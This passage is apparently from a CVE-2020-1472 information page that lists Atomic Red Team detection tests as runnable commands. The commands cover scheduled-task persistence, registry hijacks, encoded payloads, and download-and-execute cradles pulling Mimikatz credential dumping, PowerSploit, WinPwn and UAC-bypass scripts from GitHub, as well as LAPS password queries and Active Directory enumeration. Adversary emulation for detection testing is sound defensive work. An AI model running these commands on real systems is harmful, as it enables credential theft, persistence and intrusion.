cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.002 Map Admin Share PowerShell Windows PowerShell
Map Admin share utilizing PowerShell
Command (PowerShell)
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
T1021.002 Map admin share Windows CMD
Connecting To Remote Shares
Command (CMD)
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1053.005 Import XML Schedule Task with Hidden Attribute Windows PowerShell Privileged
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
Command (PowerShell)
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
T1053.005 PowerShell Modify A Scheduled Task Windows PowerShell
Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. It will first be created to spawn cmd.exe, but modified...
Command (PowerShell)
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
T1053.005 Powershell Cmdlet Scheduled Task Windows PowerShell
Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
Command (PowerShell)
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
T1053.005 Scheduled Task ("Ghost Task") via Registry Key Manipulation Windows CMD Privileged
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
T1053.005 Scheduled Task Executing Base64 Encoded Commands From Registry Windows CMD
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. ...
Command (CMD)
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
T1053.005 Scheduled Task Persistence via CompMgmt.msc Windows CMD Privileged
Adds persistence by abusing `compmgmt.msc` via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
Command (CMD)
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
T1053.005 Scheduled Task Persistence via Eventviewer.msc Windows CMD Privileged
Adds persistence by abusing `eventviewer.msc` via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, `calc.exe`).
Command (CMD)
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
T1053.005 Scheduled Task Startup Script Windows CMD Privileged
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.
Command (CMD)
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
T1053.005 Scheduled task Local Windows CMD
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
Command (CMD)
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
T1053.005 Scheduled task Remote Windows CMD Privileged
Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
Command (CMD)
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
T1053.005 Task Scheduler via VBA Windows PowerShell
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
T1053.005 Turla KopiLuwak Scheduled Task for JavaScript Stager Windows CMD
Emulates the KopiLuwak dropper's scheduled task creation stage. Creates a logon-triggered scheduled task named ProactiveScan with description "NTFS Volume Health Scan" that runs Chkdsk.js from the current user's AppData\Roaming\Microsoft directory with an RC4 decryption key...
Command (CMD)
schtasks /create /TN "ProactiveScan" /TR "wscript.exe \"%APPDATA%\Microsoft\Chkdsk.js\" -scan Kdw6gG7cpOSZsBeH" /SC ONLOGON /F
T1053.005 Turla Topinambour Dropper and Scheduled Task Persistence Windows PowerShell
Emulates the dropper behavior of Turla's Topinambour. Uses inline C# compiled via Add-Type to replicate the dropper's unpack_p() and make_some_noise() functions. unpack_p() drops a benign stand-in executable to %LOCALAPPDATA%\VirtualStore\certcheck.exe, and make_some_noise()...
Command (PowerShell)
Add-Type @'
using System;
using System.Diagnostics;
using System.IO;

public class TopinambourDropper {
    public static void unpack_p(string sourceExe) {
        string dropPath = Path.Combine(Environment.GetEnvironmentVariable("LOCALAPPDATA"), "VirtualStore", "certcheck.exe");
        Directory.CreateDirectory(Path.GetDirectoryName(dropPath));
        File.Copy(sourceExe, dropPath, true);
    }

    public static void make_some_noise() {
        ProcessStartInfo startInfo = new ProcessStartInfo("cmd", "/c schtasks /create /SC MINUTE /MO 30 /TR \"%localappdata%\\VirtualStore\\certcheck.exe\" /TN VerifiedPublisherCertCheck /F")
        {
            CreateNoWindow = true,
            UseShellExecute = false
        };
        Process.Start(startInfo).WaitForExit();
    }
}
'@
[TopinambourDropper]::unpack_p("#{benign_exe}")
[TopinambourDropper]::make_some_noise()
T1053.005 WMI Invoke-CimMethod Scheduled Task Windows PowerShell Privileged
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
Command (PowerShell)
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
T1059.001 ATHPowerShellCommandLineParameter -Command parameter variations Windows PowerShell
Executes powershell.exe with variations of the -Command parameter
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments Windows PowerShell
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations Windows PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments Windows PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 Abuse Nslookup with DNS Records Windows PowerShell
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729)
Command (PowerShell)
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
T1059.001 Invoke-AppPathBypass Windows CMD
Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Command (CMD)
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
T1059.001 Mimikatz Windows PowerShell Privileged
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
Command (PowerShell)
Import-Module "#{mimpath}"
Invoke-Mimikatz -DumpCreds
T1059.001 Mimikatz - Cradlecraft PsSendKeys Windows PowerShell Privileged
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
Command (PowerShell)
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
T1059.001 NTFS Alternate Data Stream Access Windows PowerShell
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Command (PowerShell)
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
T1059.001 PowerShell Command Execution Windows CMD
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
Command (CMD)
powershell.exe -e  #{obfuscated_code}
T1059.001 PowerShell Fileless Script Execution Windows PowerShell
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
Command (PowerShell)
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
T1059.001 PowerShell Invoke Known Malicious Cmdlets Windows PowerShell Privileged
Powershell execution of known Malicious PowerShell Cmdlets
Command (PowerShell)
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}
T1059.001 PowerShell Session Creation and Use Windows PowerShell Privileged
Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Command (PowerShell)
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
T1059.001 PowerUp Invoke-AllChecks Windows PowerShell
Check for privilege escalation paths using PowerUp from PowerShellMafia
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
T1059.001 Powershell Invoke-DownloadCradle Windows Manual
Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 Powershell MsXml COM object - with prompt Windows CMD
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 Powershell XML requests Windows CMD
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 Powershell invoke mshta.exe download Windows CMD
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 Run BloodHound from local disk Windows PowerShell
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful...
Command (PowerShell)
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
T1059.001 Run Bloodhound from Memory using Download Cradle Windows PowerShell
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution...
Command (PowerShell)
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
T1059.001 SOAPHound - Build Cache Windows PowerShell
Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound
Command (PowerShell)
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
T1059.001 SOAPHound - Dump BloodHound Data Windows PowerShell
Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound
Command (PowerShell)
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
T1087.002 Account Enumeration with LDAPDomainDump Linux Shell
This test uses LDAPDomainDump to perform account enumeration on a domain. [Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
Command (Shell)
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
T1087.002 Active Directory Domain Search Linux Shell
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
Command (Shell)
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
T1087.002 Adfind - Enumerate Active Directory Admins Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 Adfind - Enumerate Active Directory Exchange AD Objects Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 Adfind - Enumerate Active Directory User Objects Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 Adfind -Listing password policy Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 Automated AD Recon (ADRecon) Windows PowerShell
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Command (PowerShell)
Invoke-Expression "#{adrecon_path}"
T1087.002 Enumerate Active Directory Users with ADSISearcher Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1087.002 Enumerate Active Directory for Unconstrained Delegation Windows PowerShell
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information -...
Command (PowerShell)
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
T1087.002 Enumerate Default Domain Admin Details (Domain) Windows CMD
This test will enumerate the details of the built-in domain admin account
Command (CMD)
net user administrator /domain
T1087.002 Enumerate Linked Policies In ADSISearcher Discovery Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 Enumerate Root Domain linked policies Discovery Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 Enumerate all accounts (Domain) Windows CMD
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
Command (CMD)
net user /domain
net group /domain
T1087.002 Enumerate all accounts via PowerShell (Domain) Windows PowerShell
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
Command (PowerShell)
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
T1087.002 Enumerate logged on users via CMD (Domain) Windows CMD
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
Command (CMD)
query user /SERVER:#{computer_name}
T1087.002 Get-DomainUser with PowerView Windows PowerShell
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
T1087.002 Kerbrute - userenum Windows PowerShell
Enumerates active directory usernames using the userenum function of Kerbrute
Command (PowerShell)
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer all properties Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-ADComputer #{hostname} -Properties *
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 Suspicious LAPS Attributes Query with adfind all properties Windows PowerShell
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
T1087.002 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd Windows PowerShell
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 Wevtutil - Discover NTLM Users Remote Windows PowerShell
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
Command (PowerShell)
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
T1087.002 WinPwn - generaldomaininfo Windows PowerShell
Gathers general domain information using the generaldomaininfo function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (19)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-1472
portal.msrc.microsoft.com
GitHub CVE x_refsource_MISC
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
kb.cert.org
GitHub CVE third-party-advisory x_refsource_CERT-VN
https://www.kb.cert.org/vuls/id/490028
openwall.com
GitHub CVE mailing-list x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2020/09/17/2
usn.ubuntu.com
GitHub CVE vendor-advisory x_refsource_UBUNTU
https://usn.ubuntu.com/4510-1/
usn.ubuntu.com
GitHub CVE vendor-advisory x_refsource_UBUNTU
https://usn.ubuntu.com/4510-2/
lists.fedoraproject.org
GitHub CVE vendor-advisory x_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H4OTFBL6YDVFH2TBJFJIE4FMHPJEEJK3/
lists.opensuse.org
GitHub CVE vendor-advisory x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00080.html
lists.opensuse.org
GitHub CVE vendor-advisory x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00086.html
lists.fedoraproject.org
GitHub CVE vendor-advisory x_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TAPQQZZAT4TG3XVRTAFV2Y3S7OAHFBUP/
lists.fedoraproject.org
GitHub CVE vendor-advisory x_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ST6X3A2XXYMGD4INR26DQ4FP4QSM753B/
usn.ubuntu.com
GitHub CVE vendor-advisory x_refsource_UBUNTU
https://usn.ubuntu.com/4559-1/
lists.debian.org
GitHub CVE mailing-list x_refsource_MLIST
https://lists.debian.org/debian-lts-announce/2020/11/msg00041.html
security.gentoo.org
GitHub CVE vendor-advisory x_refsource_GENTOO
https://security.gentoo.org/glsa/202012-24
oracle.com
GitHub CVE x_refsource_MISC
https://www.oracle.com/security-alerts/cpuApr2021.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/159190/Zerologon-Proof-Of-Concept.html
synology.com
GitHub CVE x_refsource_CONFIRM
https://www.synology.com/security/advisory/Synology_SA_20_21
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-1472